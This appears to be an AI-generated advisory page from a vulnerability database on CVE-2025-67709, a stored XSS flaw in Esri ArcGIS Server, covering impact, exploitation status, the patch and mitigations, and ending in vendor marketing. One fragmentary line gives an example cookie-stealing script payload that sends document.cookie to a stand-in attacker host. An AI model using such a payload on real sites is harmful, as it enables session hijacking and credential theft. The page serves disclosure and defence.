
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-67709 is a stored cross-site scripting (XSS) vulnerability in Esri ArcGIS Server 11.4 and earlier on both Windows and Linux platforms. In certain configurations, it allows a remote unauthenticated attacker to store files containing malicious code that may execute within a victim's browser context. The vulnerability was published on December 31, 2025, with a patch made available on January 6, 2026. It carries a CVSS v3.1 base score of 6.1 (Medium) (Esri Advisory, ENISA EUVD).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) XSS variant. In certain ArcGIS Server configurations, the application fails to adequately sanitize or restrict file uploads or storage operations, allowing an unauthenticated remote attacker to persist malicious content on the server. When a victim subsequently accesses the affected resource through their browser, the stored malicious code executes in the victim's browser context. The changed scope (S:C) in the CVSS vector indicates the vulnerability's impact crosses security boundaries from the server to the victim's browser session (Esri Advisory, ENISA EUVD).
Successful exploitation can result in unauthorized information disclosure and integrity compromise within the victim's browser session, including potential theft of session tokens, credentials, or sensitive data rendered in the browser. Because the scope is changed, the attacker's malicious script executes in the context of the victim's browser rather than the server, enabling actions such as session hijacking, credential harvesting, or redirecting users to malicious sites. Availability is not directly impacted. The attack is limited to configurations that permit unauthenticated file storage, and exploitation requires user interaction — a victim must access the malicious content (ENISA EUVD, Esri Advisory).
As of the time of reporting, there is no public proof-of-concept exploit and no evidence of active in-the-wild exploitation. The EPSS score is approximately 0.04%, reflecting a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires user interaction (a victim must access the stored malicious content), which somewhat limits the attack surface (ENISA EUVD).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) designed to execute in a victim's browser.<script> tags) in ArcGIS Server upload directories or web-accessible storage locations.Esri has released a patch addressing this vulnerability as part of the ArcGIS Server Security 2025 Update 2 Patch, available as of January 6, 2026. Organizations should immediately apply this patch to all ArcGIS Server instances running version 11.4 or earlier on both Windows and Linux. As interim mitigations, administrators should implement network-level controls to restrict unauthenticated access to ArcGIS Server file storage endpoints, and review server configurations to disable or restrict features that allow unauthenticated file uploads where not required (Esri Advisory).
The vulnerability received limited public attention following its disclosure on December 31, 2025, with coverage primarily from automated vulnerability tracking services and aggregators such as Vulners, CVEFeed, and CIRCL Vulnerability Lookup. No significant researcher commentary or major media coverage has been identified. The Esri advisory was the primary authoritative source, and no notable community debate or vendor controversy has been observed (ENISA EUVD).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."